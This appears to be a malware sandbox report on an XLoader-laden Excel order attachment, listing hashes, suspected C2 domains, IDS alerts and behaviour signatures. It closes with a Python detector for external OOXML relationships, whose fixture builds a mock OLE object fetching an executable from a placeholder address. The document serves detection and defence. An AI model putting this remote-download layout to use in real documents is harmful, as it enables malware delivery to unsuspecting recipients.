General
Target: Parapex_New_Order.xlsx
Size: 162KB
Sample: 220628-l1mtvaadg6
MD5: 7d21038675e69d5808547b0b5a09f7e3
SHA1: eb04abc7b310d4c07a8f26ddf6f307ca51614735
SHA256: fbc610b29f55af9ff443232aa7737c990895c284d265173c8f0e3ef0598a3634
SHA512: 82212f9581dd904d20d010174db6134dd4afba063384e0e573f0034fc6b2a3cf78b552596518354edb7ed0983df0516bd301c0905d071e9d0eab046d68287997
Static task
static1

Behavioral tasks
behavioral1: Parapex_New_Order.xlsx on win7-20220414-en
behavioral2: Parapex_New_Order.xlsx on win10v2004-20220414-en
behavioral3: decrypted.xlsx on win7-20220414-en
behavioral4: decrypted.xlsx on win10v2004-20220414-en
Malware Config (extracted)
Family: xloader
Version: 2.6
Campaign: uajq
C2 domains (65 entries). XLoader/FormBook configs pad the list with decoy domains alongside the live C2, so treat each entry as an indicator to hunt and block, not as a confirmed live C2:
pixeldoughnut.com
amadeushosting.com
sitecindustrial.com
orsaigroup.com
jmuse-dev.com
angelobreviario.com
storesafe.xyz
40veryoung.com
65228267.com
xmpanshi.com
luxorscbd.com
saoirsia.com
akwadcom.com
spreast.com
net-empresa12pcs.com
avlaoge1.com
projectmuellerllc.com
hvelv.com
a2bproject.com
myhome-huahin.com
beautzenvibes.com
tzssdaayaqa.top
corporatexxx.com
sc-server-meshing.info
breadandsaltmarket.com
dac-nh.com
middleeastsecuritywatch.com
fox-influ.com
mndhestro.biz
voipverse.xyz
enrollee-healthbenconstest.com
peteinson.com
genevapunkska.com
tjysdxx.com
7t4zllco.com
healthypostureclub.fitness
npto3jzh.com
hd0b3oke2q90gz.xyz
thepeachcommission.com
duniabidan.com
ffmembership-garera.com
landllumber.site
bangimpromptu.com
visionboysnft.com
smonique.com
woomart.store
bathholidayhome.com
oci.fyi
lfla.agency
buymms1.com
uurdrzk.xyz
taliamagee.com
melishe.com
worthmoth.com
hotelnamastenepal.com
talmagart.com
ruomot.com
bitcoinodyssey.com
ezzahfatima.com
massthetics.net
yearningearningwithyoussef.com
winhcatraining.com
baunfn.online
estress.online
researchwhiz.com
Targets

Target: Parapex_New_Order.xlsx
Size: 162KB
MD5: 7d21038675e69d5808547b0b5a09f7e3
SHA1: eb04abc7b310d4c07a8f26ddf6f307ca51614735
SHA256: fbc610b29f55af9ff443232aa7737c990895c284d265173c8f0e3ef0598a3634
SHA512: 82212f9581dd904d20d010174db6134dd4afba063384e0e573f0034fc6b2a3cf78b552596518354edb7ed0983df0516bd301c0905d071e9d0eab046d68287997

Suricata alerts
ET MALWARE FormBook CnC Checkin (GET)
ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Signatures
Xloader Payload
Blocklisted process makes network request
Downloads MZ/PE file
Executes dropped EXE
Abuses OpenXML format to download file from external location
Loads dropped DLL
Uses the VBS compiler for execution
Suspicious use of SetThreadContext

Target: decrypted
Size: 156KB
MD5: 93e9cb066fc35d5134f314fc09d0be29
SHA1: 58f55fb4a02237c5891de5773c209d16df81703e
SHA256: c2ef15d0c8f81c352c930b79bb64fc29f030a78b4b8db56ebf03eb14dd62dbe1
SHA512: 1eb7309143559d5617ff0336efa1f1b37786be2d2b2711f14aaf09518eb9411b1fbfd638366bdf26f4561e78e7d4c0aa39927493b98b43d0fa28234b391ab89c

Suricata alerts
ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Signatures
Xloader Payload
Blocklisted process makes network request
Downloads MZ/PE file
Executes dropped EXE
Abuses OpenXML format to download file from external location
Loads dropped DLL
Uses the VBS compiler for execution
Suspicious use of SetThreadContext
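Both targets trigger the "Abuses OpenXML format to download file from external location" signature. An xlsx is a zip of XML parts, and the only way a part can reference something outside the archive is through a relationship in a `.rels` part with `TargetMode="External"`; when that relationship is of a type Office fetches and renders on open (an OLE object, an external link, a frame), the document becomes a downloader with no macro involved. The following is an added example, not code from the sandbox or from this report: it implements that check generically over any OOXML package and distinguishes relationships Office would fetch from plain hyperlinks. The two packages it scans are constructed in memory as fixtures, the `192.0.2.10` address is an RFC 5737 placeholder rather than an indicator from this sample, and the list of fetching relationship types is the author's own heuristic, not a specification.

```python
"""Flag OOXML (xlsx/docx/pptx) packages whose relationship parts point outside the archive.

Added example, not part of the sandbox report. The sample packages are constructed here
as fixtures; FETCHING_TYPES is a heuristic list, not an exhaustive specification.
"""
from __future__ import annotations

import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Relationship types for which Office fetches and renders/activates the target on open,
# as opposed to a hyperlink that needs a click. (Heuristic list for this example.)
FETCHING_TYPES = (
    "/relationships/oleObject",
    "/relationships/externalLink",
    "/relationships/externalLinkPath",
    "/relationships/frame",
    "/relationships/attachedTemplate",
)
# URL schemes or UNC paths that leave the host even if TargetMode was omitted.
REMOTE_TARGET = re.compile(r"^(https?|ftp|file)://|^\\\\", re.IGNORECASE)


def find_external_relationships(data: bytes) -> list[dict]:
    """Return every relationship whose target lies outside the package.

    Each hit: {"part": rels path, "type": short relationship type,
               "target": raw target, "fetches": True if Office loads it on open}.
    """
    hits: list[dict] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                # A .rels part that is not well-formed XML is itself worth reporting.
                hits.append({"part": name, "type": "malformed", "target": "", "fetches": False})
                continue
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                target = rel.get("Target", "")
                external = rel.get("TargetMode", "Internal") == "External"
                if not external and not REMOTE_TARGET.match(target):
                    continue
                rtype = rel.get("Type", "")
                hits.append({
                    "part": name,
                    "type": rtype.rsplit("/", 1)[-1],
                    "target": target,
                    "fetches": rtype.endswith(FETCHING_TYPES),
                })
    return hits


def would_fetch_remote(data: bytes) -> bool:
    """True when opening the document would make Office retrieve a remote object."""
    return any(h["fetches"] for h in find_external_relationships(data))


def _package(parts: dict[str, str]) -> bytes:
    """Build a minimal OOXML-shaped zip from {path: xml_text} (fixture, not a real workbook)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for path, xml in parts.items():
            zf.writestr(path, xml)
    return buf.getvalue()


_RELS_HEAD = f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{RELS_NS}">'
_ROOT_RELS = (_RELS_HEAD + f'<Relationship Id="rId1" Type="{OFFICE_REL}officeDocument" '
              'Target="xl/workbook.xml"/></Relationships>')

# Constructed benign package: every relationship stays inside the archive.
BENIGN_XLSX = _package({"_rels/.rels": _ROOT_RELS, "xl/workbook.xml": "<workbook/>"})

# Constructed malicious layout: a drawing-level OLE object with a remote target (placeholder
# RFC 5737 address, not an indicator from this sample) plus an ordinary external hyperlink.
MALICIOUS_XLSX = _package({
    "_rels/.rels": _ROOT_RELS,
    "xl/drawings/_rels/drawing1.xml.rels": (
        _RELS_HEAD + f'<Relationship Id="rId1" Type="{OFFICE_REL}oleObject" '
        'Target="http://192.0.2.10/xs.exe" TargetMode="External"/></Relationships>'),
    "xl/worksheets/_rels/sheet1.xml.rels": (
        _RELS_HEAD + f'<Relationship Id="rId1" Type="{OFFICE_REL}hyperlink" '
        'Target="https://example.com/" TargetMode="External"/></Relationships>'),
    "xl/workbook.xml": "<workbook/>",
})

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_XLSX), ("malicious", MALICIOUS_XLSX)):
        print(label, "fetches remote:", would_fetch_remote(blob))
        for hit in find_external_relationships(blob):
            print("  ", hit)
```

Run the same function over a suspect attachment by passing `open(path, "rb").read()`; a hit with `fetches` set is the static equivalent of the sandbox signature, while a hyperlink-only hit is normal for many legitimate workbooks and should not be blocked on its own.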